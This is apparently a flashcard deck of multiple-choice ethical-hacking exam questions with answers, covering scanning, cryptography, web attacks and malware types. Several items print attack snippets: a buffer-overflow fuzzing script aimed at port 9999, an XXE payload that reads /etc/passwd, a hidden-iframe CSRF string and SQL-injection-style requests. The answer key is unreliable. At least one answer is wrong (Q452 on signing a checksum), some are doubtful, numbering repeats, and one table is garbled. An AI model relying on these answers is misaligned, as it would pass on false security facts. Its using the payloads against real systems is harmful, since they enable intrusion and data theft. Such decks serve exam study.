You have compromised a server and successfully gained a root access. You want to pivot and pass traffic undetected over the network and evade any possible Intrusion Detection System. What is the best approach?

Use Alternate Data Streams to hide the outgoing packets from this server.
Use HTTP so that all traffic can be routed vis a browser, thus evading the internal Intrusion Detection Systems.
Install Cryptcat and encrypt outgoing packets from this server.
Install and use Telnet to encrypt all outgoing traffic from this server.

A

Install Cryptcat and encrypt outgoing packets from this server.

364
Q

A hacker has successfully infected an internet-facing server which he will then use to send junk mail, take part in coordinated attacks, or host junk email content. Which sort of trojan infects this server?

Botnet Trojan
Banking Trojans
Turtle Trojans
Ransomware Trojans

A

Botnet Trojan

365
Q

How can rainbow tables be defeated?

Use of non-dictionary words
All uppercase character passwords
Password salting
Lockout accounts under brute force password cracking attempts

A

Password salting

366
Q

Bob, your senior colleague, has sent you a mail regarding a deal with one of the clients. You are requested to accept the offer and you oblige. After 2 days, Bab denies that he had ever sent a mail.
What do you want to ““know”” to prove yourself that it was Bob who had send a mail?

Non-Repudiation
Integrity
Authentication
Confidentiality

A

Non-Repudiation

367
Q

Attempting an injection attack on a web server based on responses to True/False

Compound SQLi
Blind SQLi
Classic SQLi
DMS-specific SQLi

A

Blind SQLi

368
Q

What would be the purpose of running “wget 192.168.0.15 -q -S” against a web server?

Performing content enumeration on the web server to discover hidden folders
Using wget to perform banner grabbing on the webserver
Flooding the web server with requests to perform a DoS attack
Downloading all the contents of the web page locally for further examination

A

Using wget to perform banner grabbing on the webserver

369
Q

The security administrator of ABC needs to permit Internet traffic in the host 10.0.0.2 and UDP traffic in the host
10.0.0.3. He also needs to permit all FTP traffic to the rest of the network and deny all other traffic. After he
applied his ACL configuration in the router, nobody can access the ftp, and the permitted hosts cannot access the Internet. According to the next configuration, what is happening in the network? access-list 102 deny tcp any any access-list 104 permit udp host 10.0.0.3 any access-list 110 permit tcp host 10.0.0.2 eq www any access-list 108 permit tcp any eq ftp any

The ACL 104 needs to be first because is UDP
The first ACL is denying all TCP traffic and the other ACLs are being ignored by the router
The ACL for FTP must be before the ACL 110
The ACL 110 needs to be changed to port 80

A

The first ACL is denying all TCP traffic and the other ACLs are being ignored by the router

370
Q

Which of the following provides a security professional with most information about the system’s security posture?

Phishing, spamming, sending trojans
Social engineering, company site browsing tailgating
Wardriving, warchalking, social engineering
Port scanning, banner grabbing service identification

A

Port scanning, banner grabbing service identification

371
Q

Firewalls are the software or hardware systems that are able to control and monitor the traffic coming in and out the target network based on pre-defined set of rules. Which of the following types of firewalls can protect against SQL injection attacks?

Data-driven firewall
Packet firewall
Web application firewall
Stateful firewall

A

Web application firewall

372
Q

If executives are found liable for not properly protecting their company’s assets and information systems, what type of law would apply in this situation?

Criminal
International
Common
Civil

A

Civil

372
Q

An attacker scans a host with the below command. Which three flags are set? # nmap -sX host.domain.com

This is SYN scan. SYN flag is set.
This is Xmas scan. URG, PUSH and FIN are set.
This is ACK scan. ACK flag is set.
This is Xmas scan. SYN and ACK flags are set.

A

This is Xmas scan. URG, PUSH and FIN are set.

373
Q

Which access control mechanism allows for multiple systems to use a central authentication server
(CAS) that permits users to authenticate once and gain access to multiple systems?

Role Based Access Control (RBAC)
Discretionary Access Control (DAC)
Single sign-on
Windows authentication

A

Single sign-on

374
Q

What would you enter if you wanted to perform a stealth scan using Nmap?

nmap -sM
nmap -sU
nmap -sS
nmap -sT

A

nmap -sS

375
Q

Which protocol is used for setting up secure channels between two devices, typically in VPNs?

PEM
ppp
IPSEC
SET

A

IPSEC

376
Q

You have compromised a server on a network and successfully opened a shell. You aimed to identify all operating systems running on the network. However, as you attempt to fingerprint all machines in the network using the nmap syntax below, it is not going through. invictus@victim_server.~$ nmap -T4 -O 10.10.0.0/24 TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx xxxxxxxxx. QUITTING!
What seems to be wrong?

The nmap syntax is wrong.
This is a common behavior for a corrupted nmap application.
The outgoing TCP/IP fingerprinting is blocked by the host firewall.
OS Scan requires root privileges.

A

OS Scan requires root privileges.

377
Q

What is the most common method to exploit the “Bash Bug” or “Shellshock” vulnerability?

SYN Flood
SSH
Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable Web server
Manipulate format strings in text fields

A

Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable Web server

378
Q

Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results?

TCP port 21 no response
TCP port 22 no response
TCP port 23 Time-to-live exceeded

The lack of response from ports 21 and 22 indicate that those services are not running on the destination server

The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error

The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall

The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host

A

The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall

379
Q

!/usr/bin/python import socket buffer=[““A””] counter=50 while len(buffer)<=100: buffer.append

(““A””*counter)
counter=counter+50 commands= [““HELP””,““STATS .””,““RTIME .””,““LTIME. ””,““SRUN .”’,““TRUN
.””,““GMON
.””,““GDOG .””,““KSTET .”,““GTER .””,““HTER .””, ““LTER .”,““KSTAN .””] for command in commands: for buffstring in buffer: print ““Exploiting”” +command +““:””+str(len(buffstring)) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((‘127.0.0.1’, 9999)) s.recv(50) s.send(command+buffstring) s.close()

What is the code written for?

Denial-of-service (DOS)
Buffer Overflow
Bruteforce
Encryption

A

Buffer Overflow

380
Q

Which tier in the N-tier application architecture is responsible for moving and processing data between the tiers?

Presentation tier
Application Layer
Logic tier
Data tier

A

Logic tier

381
Q

In both pharming and phishing attacks, an attacker can create websites that look similar to legitimate sites with the intent of collecting personal identifiable information from its victims. What is the difference between pharming and phishing attacks?

In a pharming attack, a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack, an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name

In a phishing attack, a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack, an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual websites domain name

Both pharming and phishing attacks are purely technical and are not considered forms of social engineering

Both pharming and phishing attacks are identical

A

In a pharming attack, a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack, an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name

382
Q

When configuring wireless on his home router, Javik disables SSID broadcast. He leaves authentication “open” but sets the SSID to a 32-character string of random letters and numbers. What is an accurate assessment of this scenario from a security perspective?

Since the SSID is required in order to connect, the 32-character string is sufficient to prevent brute- force attacks.

Disabling SSID broadcast prevents 802.11 beacons from being transmitted from the access point, resulting in a valid setup leveraging “security through obscurity”.

It is still possible for a hacker to connect to the network after sniffing the SSID from a successful wireless association.

Javik’s router is still vulnerable to wireless hacking attempts because the SSID broadcast setting can be enabled using a specially crafted packet sent to the hardware address of the access point.

A

It is still possible for a hacker to connect to the network after sniffing the SSID from a successful wireless association.

383
Q

Chandler works as a pen-tester in an IT-firm in New York. As a part of detecting viruses in the systems, he uses a detection method where the anti-virus executes the malicious codes on a virtual machine to simulate CPU and memory activities. Which type of virus detection method did Chandler use in this context?

Heuristic Analysis
Code Emulation
Scanning
Integrity checking

A

Code Emulation

384
Q

Which of the following statements is TRUE?

Packet Sniffers operate on the Layer 1 of the OSI model.
Packet Sniffers operate on Layer 2 of the OSI model.
Packet Sniffers operate on both Layer 2 & Layer 3 of the OSI model.
Packet Sniffers operate on Layer 3 of the OSI model.

A

Packet Sniffers operate on Layer 2 of the OSI model.

385
Q

Insecure direct object reference is a type of vulnerability where the application does not verify if the user is authorized to access the internal object via its name or key. Suppose a malicious user Rob tries to get access to the account of a benign user Ned.
Which of the following requests best illustrates an attempt to exploit an insecure direct object reference vulnerability?

“GET /restricted/goldtransfer?to=Rob&from=1 or 1=1’ HTTP/1.1Host: westbank.com”

“GET /restricted/\r\n\%00account%00Ned%00access HTTP/1.1 Host: westbank.com”

“GET /restricted/accounts/?name=Ned HTTP/1.1 Host westbank.com”

“GET /restricted/ HTTP/1.1 Host: westbank.com

A

“GET /restricted/accounts/?name=Ned HTTP/1.1 Host westbank.com”

386
Q

Mary found a high vulnerability during a vulnerability scan and notified her server team. After analysis, they sent her proof that a fix to that issue had already been applied. The vulnerability that Marry found is called what?

False-negative
False-positive
Brute force attack
Backdoor

A

False-positive

387
Q

What is the least important information when you analyze a public IP address in a security alert?

DNS
Whois
Geolocation
ARP

A

ARP

388
Q

You are a security officer of a company. You had an alert from IDS that indicates that one PC on your Intranet is connected to a blacklisted IP address (C2 Server) on the Internet. The IP address was blacklisted just before the alert. You are starting an investigation to roughly analyze the severity of the situation. Which of the following is appropriate to analyze?

IDS log
Event logs on domain controller
Internet Firewall/Proxy log.
Event logs on the PC

A

Internet Firewall/Proxy log.

389
Q

Which of the following antennas is commonly used in communications for a frequency band of 10 MHz to VHF and UHF?

Yagi antenna
Dipole antenna
Parabolic grid antenna
Omnidirectional antenna

A

Yagi antenna

390
Q

From the following table, identify the wrong answer in terms of Range (ft).
Standard Range (ft)
802.11a 150-150
802.11b 150-150
802.11g 150-150
802.16 (WiMax) 30 miles

802.16 (WiMax)
802.11g
802.11b
802.11a

A

802.11a

391
Q

Which tool can be used to silently copy files from USB devices?

USB Grabber
USB Snoopy
USB Sniffer
Use Dumper

A

Use Dumper

392
Q

A security analyst is performing an audit on the network to determine if there are any deviations from the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem installed.
Which security policy must the security analyst check to see if dial-out modems are allowed?

Firewall-management policy
Acceptable-use policy
Permissive policy
Remote-access policy

A

Remote-access policy

393
Q

ping-* 6 192.168.0.101 Output:
Pinging 192.168.0.101 with 32 bytes of data:
Reply from 192.168.0.101: bytes=32 time<1ms TTL=128
Reply from 192.168.0.101: bytes=32 time<1ms TTL=128
Reply from 192.168.0.101: bytes=32 time<1ms TTL=128
Reply from 192.168.0.101: bytes=32 time<1ms TTL=128
Reply from 192.168.0.101: bytes=32 time<1ms TTL=128 Reply from 192.168.0.101:
Ping statistics for 192.168.0101
Packets: Sent = 6, Received = 6, Lost = 0 (0% loss).
Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms What does the option * indicate?

t
s
a
n

A

n

394
Q

Which of the following is a passive wireless packet analyzer that works on Linux-based systems?

Burp Suite
OpenVAS
tshark
Kismet

A

tshark

395
Q

A company’s Web development team has become aware of a certain type of security vulnerability in their Web software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the software requirements to disallow users from entering HTML as input into their Web application.
What kind of Web application vulnerability likely exists in their software?

Cross-site scripting vulnerability
SQL injection vulnerability
Web site defacement vulnerability
Gross-site Request Forgery vulnerability

A

Cross-site scripting vulnerability

396
Q

On performing a risk assessment, you need to determine the potential impacts when some of the critical business processes of the company interrupt its service.
What is the name of the process by which you can determine those critical businesses?

Emergency Plan Response (EPR)
Business Impact Analysis (BIA)
Risk Mitigation
Disaster Recovery Planning (DRP)

A

Business Impact Analysis (BIA)

397
Q

What type of a vulnerability/attack is it when the malicious person forces the user’s browser to send an authenticated request to a server?

Session hijacking
Server side request forgery
Cross-site request forgery
Cross-site scripting

A

Cross-site request forgery

398
Q

Websites and web portals that provide web services commonly use the Simple Object Access Protocol (SOAP).
Which of the following is an incorrect definition or characteristics of the protocol?

Exchanges data between web services
Only compatible with the application protocol HTTP
Provides a structured model for messaging
Based on XML

A

Only compatible with the application protocol HTTP

399
Q

A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much information can be obtained from the firm’s public facing web servers. The engineer decides to start by using netcat to port 80.
The engineer receives this output:
HTTP/1.1 200 OK
Server: Microsoft-IIS/6
Expires: Tue, 17 Jan 2011 01:41:33 GMT
Date: Mon, 16 Jan 2011 01:41:33 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last Modified: Wed, 28 Dec 2010 15:32:21 GMT
ETag:“b0aac0542e25c31:89d”
Content-Length: 7369
Which of the following is an example of what the engineer performed?

Banner grabbing
SQL injection
Whois database query
Cross-site scripting

A

Banner grabbing

400
Q

The network in ABC company is using the network address 192.168.1.64 with mask 255.255.255.192. In the network the servers are in the addresses 192.168.1.122, 192.168.1.123 and 192.168.1.124. An attacker is trying to find those servers but he cannot see them in his scanning. The command he is using is: nmap 192.168.1.64/28.
Why he cannot see the servers?

He needs to add the command ““ip address”” just before the IP address

He needs to change the address to 192.168.1.0 with the same mask

He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that range

The network must be dawn and the nmap command and IP address are ok

A

He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that range

401
Q

An attacker changes the profile information of a particular user (victim) on the target website. The attacker uses this string to update the victim’s profile to a text file and then submit the data to the attacker’s database.
< iframe src=““http://www.vulnweb.com/updateif.php”” style=““display:none”” > < /iframe >
What is this type of attack (that can use either HTTP GET or HTTP POST) called?

Browser Hacking
Cross-Site Scripting
SQL Injection
Cross-Site Request Forgery

A

Cross-Site Request Forgery

402
Q

Which Metasploit Framework tool can help penetration tester for evading Anti-virus Systems?

msfpayload
msfcli
msfd
msfencode

A

msfencode

403
Q

When you are testing a web application, it is very useful to employ a proxy tool to save every request and response. You can manually test every request and analyze the response to find vulnerabilities. You can test parameter and headers manually to get more precise results than if using web vulnerability scanners.
What proxy tool will help you find web vulnerabilities?

Maskgen
Dimitry
Burpsuite
Proxychains

A

Burpsuite

404
Q

Which Nmap option would you use if you were not concerned about being detected and wanted to perform a very fast scan?

-T5
-O
-T0
-A

A

-T5

405
Q

Geena, a cloud architect, uses a master component in the Kubernetes cluster architecture that scans
newly generated pods and allocates a node to them. This component can also assign nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions.
Which of the following master components is explained in the above scenario?

Kube-controller-manager
Kube-scheduler
Kube-apiserver
Etcd cluster

A

Kube-scheduler

406
Q

___ is a type of phishing that targets high-profile executives such as CEOs, CFOs, politicians, and celebrities who have access to confidential and highly valuable information.

Spear phishing
Whaling
Vishing
Phishing

A

Whaling

407
Q

Peter, a system administrator working at a reputed IT firm, decided to work from his home and login remotely. Later, he anticipated that the remote connection could be exposed to session hijacking. To curb this possibility, he implemented a technique that creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information and prevent hackers from decrypting the data flow between the endpoints. What is the technique followed by Peter to send files securely through a remote connection?

DMZ
SMB signing
VPN
Switch network

A

VPN

408
Q

An attacker can employ many methods to perform social engineering against unsuspecting
employees, including scareware.
What is the best example of a scareware attack?

A pop-up appears to a user stating, “You have won a free cruise! Click here to claim your prize!”

A banner appears to a user stating, “Your account has been locked. Click here to reset your password and unlock your account.”

A banner appears to a user stating, “Your Amazon order has been delayed. Click here to find out your new delivery date.”

A pop-up appears to a user stating, “Your computer may have been infected with spyware. Click here to install an anti-spyware tool to resolve this issue.”

A

A pop-up appears to a user stating, “Your computer may have been infected with spyware. Click here to install an anti-spyware tool to resolve this issue.”

409
Q

Bill has been hired as a penetration tester and cyber security auditor for a major credit card company. Which information security standard is most applicable to his role?

FISMA
HITECH
PCI-DSS
Sarbanes-OxleyAct

A

PCI-DSS

410
Q

Tony wants to integrate a 128-bit symmetric block cipher with key sizes of 128,192, or 256 bits into a software program, which involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. Which of the following algorithms includes all the above features and can be integrated by Tony into the software program?

TEA
CAST-128
RC5
serpent

A

serpent

411
Q

Morris, an attacker, wanted to check whether the target AP is in a locked state. He attempted using different utilities to identify WPS-enabled APs in the target wireless network. Ultimately, he succeeded with one special command-line utility. Which of the following command-line utilities allowed Morris to discover the WPS-enabled APs?

wash
ntptrace
macof
net View

A

wash

412
Q

What type of virus is most likely to remain undetected by antivirus software?

Cavity virus
Stealth virus
File-extension virus
Macro virus

A

Stealth virus

413
Q

Ben purchased a new smartphone and received some updates on it through the OTA method. He received two messages: one with a PIN from the network operator and another asking him to enter the PIN received from the operator. As soon as he entered the PIN, the smartphone started functioning in an abnormal manner. What is the type of attack performed on Ben in the above scenario?

Advanced SMS phishing
Bypass SSL pinning
Phishing
Tap ‘n ghost attack

A

Advanced SMS phishing

414
Q

Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web server to identify any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an automated tool that eases his work and performs vulnerability scanning to find hosts, services, and other vulnerabilities in the target server. Which of the following tools is used by Jack to perform vulnerability scanning?

Infoga
WebCopier Pro
Netsparker
NCollector Studio

A

Netsparker

415
Q

Stephen, an attacker, targeted the industrial control systems of an organization. He generated a fraudulent email with a malicious attachment and sent it to employees of the target organization. An employee who manages the sales software of the operational plant opened the fraudulent email and clicked on the malicious attachment. This resulted in the malicious attachment being downloaded and malware being injected into the sales software maintained in the victim’s system. Further, the malware propagated itself to other networked systems, finally damaging the industrial automation components. What is the attack technique used by Stephen to damage the industrial systems?

Spear-phishing attack
SMishing attack
Reconnaissance attack
HMI-based attack

A

Spear-phishing attack

416
Q

Shiela is an information security analyst working at HiTech Security Solutions. She is performing service version discovery using Nmap to obtain information about the running services and their versions on a target system.
Which of the following Nmap options must she use to perform service version discovery on the target host?

-SN
-SX
-sV
-SF

A

-sV

417
Q

Kate dropped her phone and subsequently encountered an issue with the phone’s internal speaker. Thus, she is using the phone’s loudspeaker for phone calls and other activities. Bob, an attacker, takes advantage of this vulnerability and secretly exploits the hardware of Kate’s phone so that he can monitor the loudspeaker’s output from data sources such as voice assistants, multimedia messages, and audio files by using a malicious app to breach speech privacy. What is the type of attack Bob performed on Kate in the above scenario?

Man-in-the-disk attack
aLTEr attack
SIM card attack
Spearphone attack

A

Spearphone attack

418
Q

Jude, a pen tester, examined a network from a hacker’s perspective to identify exploits and vulnerabilities accessible to the outside world by using devices such as firewalls, routers, and servers. In this process, he also estimated the threat of network security attacks and determined the level of security of the corporate network.
What is the type of vulnerability assessment that Jude performed on the organization?

External assessment
Passive assessment
Host-based assessment
Application assessment

A

External assessment

418
Q

Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the organization’s network.
Which type of threat intelligence is used by Roma to secure the internal network?

Technical threat intelligence
Operational threat intelligence
Tactical threat intelligence
Strategic threat intelligence

A

Technical threat intelligence

419
Q

Becky has been hired by a client from Dubai to perform a penetration test against one of their remote offices. Working from her location in Columbus, Ohio, Becky runs her usual reconnaissance scans to obtain basic information about their network. When analyzing the results of her Whois search, Becky notices that the IP was allocated to a location in Le Havre, France. Which regional Internet registry should Becky go to for detailed information?

ARIN
APNIC
RIPE
LACNIC

A

RIPE

420
Q

Joel, a professional hacker, targeted a company and identified the types of websites frequently visited by its employees. Using this information, he searched for possible loopholes in these websites and injected a malicious script that can redirect users from the web page and download malware onto a victim’s machine. Joel waits for the victim to access the infected web application so as to compromise the victim’s machine. Which of the following techniques is used by Joel in the above scenario?

DNS rebinding attack
Clickjacking attack
MarioNet attack
Watering hole attack

A

Watering hole attack

421
Q

Juliet, a security researcher in an organization, was tasked with checking for the authenticity of images to be used in the organization’s magazines. She used these images as a search query and tracked the original source and details of the images, which included photographs, profile pictures, and memes. Which of the following footprinting techniques did Rachel use to finish her task?

Reverse image search
Meta search engines
Advanced image search
Google advanced search

A

Reverse image search

422
Q

A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the current time from the target host machine.
Which of the following Zenmap options must the analyst use to perform the ICMP timestamp ping scan?

-PY
-PU
-PP
-Pn

A

-PP

423
Q

Elante company has recently hired James as a penetration tester. He was tasked with performing enumeration on an organization’s network. In the process of enumeration, James discovered a service that is accessible to external sources. This service runs directly on port 21. What is the service enumerated byjames in the above scenario?

Border Gateway Protocol (BGP)
File Transfer Protocol (FTP)
Network File System (NFS)
Remote procedure call (RPC)

A

File Transfer Protocol (FTP)

423
Q

Given below are different steps involved in the vulnerability-management life cycle.
Remediation
Identify assets and create a baseline
Verification
Monitor
Vulnerability scan
Risk assessment
Identify the correct sequence of steps involved in vulnerability management.

2–>5–>6–>1–>3–>4
2–>1–>5–>6–>4–>3
2–>4–>5–>3–>6–> 1
1–>2–>3–>4–>5–>6

A

2–>5–>6–>1–>3–>4

424
Q

Tony is a penetration tester tasked with performing a penetration test. After gaining initial access to a target system, he finds a list of hashed passwords.
Which of the following tools would not be useful for cracking the hashed passwords?

John the Ripper
Hashcat
netcat
THC-Hydra

A

netcat

425
Q

Which Nmap switch helps evade IDS or firewalls?

-n/-R
-0N/-0X/-0G
-T
-D

A

-T

426
Q

Harper, a software engineer, is developing an email application. To ensure the confidentiality of email messages. Harper uses a symmetric-key block cipher having a classical 12- or 16-round Feistel network with a block size of 64 bits for encryption, which includes large 8 x 32-bit S-boxes (S1, S2, S3, S4) based on bent functions, modular addition and subtraction, key-dependent rotation, and XOR operations. This cipher also uses a masking key(Km1)and a rotation key (Kr1) for performing its functions. What is the algorithm employed by Harper to secure the email messages?

CAST-128
AES
GOST block cipher
DES

A

CAST-128

427
Q

Which of the following Google advanced search operators helps an attacker in gathering information about websites that are similar to a specified target URL?

[inurl:]
[related:]
[info:]
[site:]

A

[related:]

428
Q

The security team of Debry Inc. decided to upgrade Wi-Fi security to thwart attacks such as dictionary attacks and key recovery attacks. For this purpose, the security team started implementing cutting-edge technology that uses a modern key establishment protocol called the simultaneous authentication of equals (SAE), also known as dragonfly key exchange, which replaces the PSK concept. What is the Wi-Fi encryption technology implemented by Debry Inc.?

WEP
WPA
WPA2
WPA3

A

WPA3

429
Q

Stella, a professional hacker, performs an attack on web services by exploiting a vulnerability that provides additional routing information in the SOAP header to support asynchronous
communication. This further allows the transmission of web-service requests and response messages using different TCP connections. Which of the following attack techniques is used by Stella to compromise the web services?

XML injection
WS-Address spoofing
SOAPAction spoofing
Web services parsing attacks

A

WS-Address spoofing

429
Q

James is working as an ethical hacker at Technix Solutions. The management ordered James to discover how vulnerable its network is towards footprinting attacks. James took the help of an open- source framework for performing automated reconnaissance activities. This framework helped James in gathering information using free tools and resources. What is the framework used by James to conduct footprinting and reconnaissance activities?

WebSploit Framework
Browser Exploitation Framework
OSINT framework
SpeedPhish Framework

A

OSINT framework

430
Q

Thomas, a cloud security professional, is performing security assessment on cloud services to identify any loopholes. He detects a vulnerability in a bare-metal cloud server that can enable hackers to implant malicious backdoors in its firmware. He also identified that an installed backdoor can persist even if the server is reallocated to new clients or businesses that use it as an laaS. What is the type of cloud attack that can be performed by exploiting the vulnerability discussed in the above scenario?

Man-in-the-cloud (MITC) attack
Cloud cryptojacking
Cloudborne attack
Metadata spoofing attack

A

Cloudborne attack

431
Q

Which among the following is the best example of the third step (delivery) in the cyber kill chain?

An intruder sends a malicious attachment via email to a target.
An intruder creates malware to be used as a malicious attachment to an email.
An intruder’s malware is triggered when a target opens a malicious email attachment.
An intruder’s malware is installed on a target’s machine.

A

An intruder sends a malicious attachment via email to a target.

432
Q

Dayn, an attacker, wanted to detect if any honeypots are installed in a target network. For this purpose, he used a time-based TCP fingerprinting method to validate the response to a normal computer and the response of a honeypot to a manual SYN request. Which of the following techniques is employed by Dayn to detect honeypots?

Detecting honeypots running on VMware
Detecting the presence of Honeyd honeypots
Detecting the presence of Snort_inline honeypots
Detecting the presence of Sebek-based honeypots

A

Detecting the presence of Snort_inline honeypots

433
Q

Which type of malware spreads from one system to another or from one network to another and causes similar types of damage as viruses do to the infected system?

Rootkit
Trojan
Worm
Adware

A

Worm

434
Q

A group of hackers were roaming around a bank office building in a city, driving a luxury car. They were using hacking tools on their laptop with the intention to find a free-access wireless network. What is this hacking process known as?

GPS mapping
Spectrum analysis
Wardriving
Wireless sniffing

A

Wardriving

435
Q

John, a security analyst working for an organization, found a critical vulnerability on the organization’s LAN that allows him to view financial and personal information about the rest of the employees. Before reporting the vulnerability, he examines the information shown by the vulnerability for two days without disclosing any information to third parties or other internal employees. He does so out of curiosity about the other employees and may take advantage of this information later. What would John be considered as?

Cybercriminal
Black hat
White hat
Gray hat

A

Gray hat

436
Q

BitLocker encryption has been implemented for all the Windows-based computers in an organization. You are concerned that someone might lose their cryptographic key. Therefore, a mechanism was implemented to recover the keys from Active Directory. What is this mechanism called in cryptography?

Key archival
Key escrow.
Certificate rollover
Key renewal

A

Key escrow.

437
Q

Miley, a professional hacker, decided to attack a target organization’s network. To perform the attack, she used a tool to send fake ARP messages over the target network to link her MAC address with the target system’s IP address. By performing this, Miley received messages directed to the victim’s MAC address and further used the tool to intercept, steal, modify, and block sensitive communication to the target system. What is the tool employed by Miley to perform the above attack?

Gobbler
KDerpNSpoof
BetterCAP
Wireshark

A

BetterCAP

438
Q

Mason, a professional hacker, targets an organization and spreads Emotet malware through malicious script. After infecting the victim’s device. Mason further used Emotet to spread the infection across local networks and beyond to compromise as many machines as possible. In this process, he used a tool, which is a self-extracting RAR file, to retrieve information related to network resources such as writable share drives. What is the tool employed by Mason in the above scenario?

NetPass.exe
Outlook scraper
WebBrowserPassView
Credential enumerator

A

Credential enumerator

439
Q

Which wireless security protocol replaces the personal pre-shared key (PSK) authentication with Simultaneous Authentication of Equals (SAE) and is therefore resistant to offline dictionary attacks?

WPA3-Personal
WPA2-Enterprise
Bluetooth
ZigBee

A

WPA3-Personal

440
Q

A “Server-Side Includes” attack refers to the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary code remotely.
Which web-page file type, if it exists on the web server, is a strong indication that the server is vulnerable to this kind of attack?

.stm
.html
.rss
.cms

A

.stm

441
Q

Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following input?
<!DOCTYPE blah [ < IENTITY trustme SYSTEM “file:///etc/passwd” > ] >

XXE
SQLi
IDOR
XXS

A

XXE

442
Q

Which of the following allows attackers to draw a map or outline the target organization’s network infrastructure to know about the actual environment that they are going to hack.

Enumeration
Vulnerability analysis
Malware analysis
Scanning networks

A

Scanning networks

443
Q

Eric, a cloud security engineer, implements a technique for securing the cloud resources used by his organization. This technique assumes by default that a user attempting to access the network is not an authentic entity and verifies every incoming connection before allowing access to the network. Using this technique, he also imposed conditions such that employees can access only the resources required for their role.
What is the technique employed by Eric to secure cloud resources?

Serverless computing
Demilitarized zone
Container technology
Zero trust network

A

Zero trust network

444
Q

Calvin, a software developer, uses a feature that helps him auto-generate the content of a web page without manual involvement and is integrated with SSI directives. This leads to a vulnerability in the developed web application as this feature accepts remote user inputs and uses them on the page. Hackers can exploit this feature and pass malicious SSI directives as input values to perform malicious activities such as modifying and erasing server files. What is the type of injection attack Calvin’s web application is susceptible to?

Server-side template injection
Server-side JS injection
CRLF injection
Server-side includes injection

A

Server-side includes injection

445
Q

John, a professional hacker, targeted CyberSol Inc., an MNC. He decided to discover the loT devices connected in the target network that are using default credentials and are vulnerable to various hijacking attacks. For this purpose, he used an automated tool to scan the target network for specific types of loT devices and detect whether they are using the default, factory-set credentials. What is the tool employed by John in the above scenario?

loTSeeker
loT Inspector
AT&T loT Platform
Azure loT Central

A

loTSeeker

446
Q

Josh has finished scanning a network and has discovered multiple vulnerable services. He knows that several of these usually have protections against external sources but are frequently susceptible to internal users. He decides to draft an email, spoof the sender as the internal IT team, and attach a malicious file disguised as a financial spreadsheet. Before Josh sends the email, he decides to investigate other methods of getting the file onto the system. For this particular attempt, what was the last stage of the cyber kill chain that Josh performed?

Exploitation
Weaponization
Delivery
Reconnaissance

A

Weaponization

447
Q

An organization decided to harden its security against web-application and web-server attacks. John, a security personnel in the organization, employed a security scanner to automate web-application security testing and to guard the organization’s web infrastructure against web-application threats. Using that tool, he also wants to detect XSS, directory transversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks. Which of the following security scanners will help John perform the above task?

AlienVault®OSSIM™
Syhunt Hybrid
Saleae Logic Analyzer
Cisco ASA

A

Syhunt Hybrid

448
Q

To hide the file on a Linux system, you have to start the filename with a specific character. What is the character?

Exclamation mark (!)
Underscore (_)
Tilde H
Period (.)

A

Period (.)

449
Q

Harris is attempting to identify the OS running on his target machine. He inspected the initial TTL in the IP header and the related TCP window size and obtained the following results:
TTL: 64 Window Size: 5840
What is the OS running on the target machine?

Solaris OS
Windows OS
Mac OS
Linux OS

A

Linux OS

450
Q

Attacker Rony installed a rogue access point within an organization’s perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by johnson in the above scenario?

Host-based assessment
Wireless network assessment
Application assessment
Distributed assessment

A

Wireless network assessment

451
Q

Jane is working as a security professional at CyberSol Inc. She was tasked with ensuring the authentication and integrity of messages being transmitted in the corporate network. To encrypt the messages, she implemented a security model in which every user in the network maintains a ring of public keys. In this model, a user needs to encrypt a message using the receiver’s public key, and only the receiver can decrypt the message using their private key. What is the security model implemented by Jane to secure corporate messages?

Zero trust network
Transport Layer Security (TLS)
Secure Socket Layer (SSL)
Web of trust (WOT)

A

Web of trust (WOT)

451
Q

While performing an Nmap scan against a host, Paola determines the existence of a firewall. In an attempt to determine whether the firewall is stateful or stateless, which of the following options would be best to use?

-sA
-sX
-sT
-sF

A

-sA

452
Q

Bob wants to ensure that Alice can check whether his message has been tampered with. He creates a checksum of the message and encrypts it using asymmetric cryptography. What key does Bob use to encrypt the checksum for accomplishing this goal?

Alice’s private key
Alice’s public key
His own private key
His own public key

A

Alice’s public key

453
Q

Mirai malware targets loT devices. After infiltration, it uses them to propagate and create botnets that then used to launch which types of attack?

MITM attack
Birthday attack
DDoS attack
Password attack

A

DDoS attack

454
Q

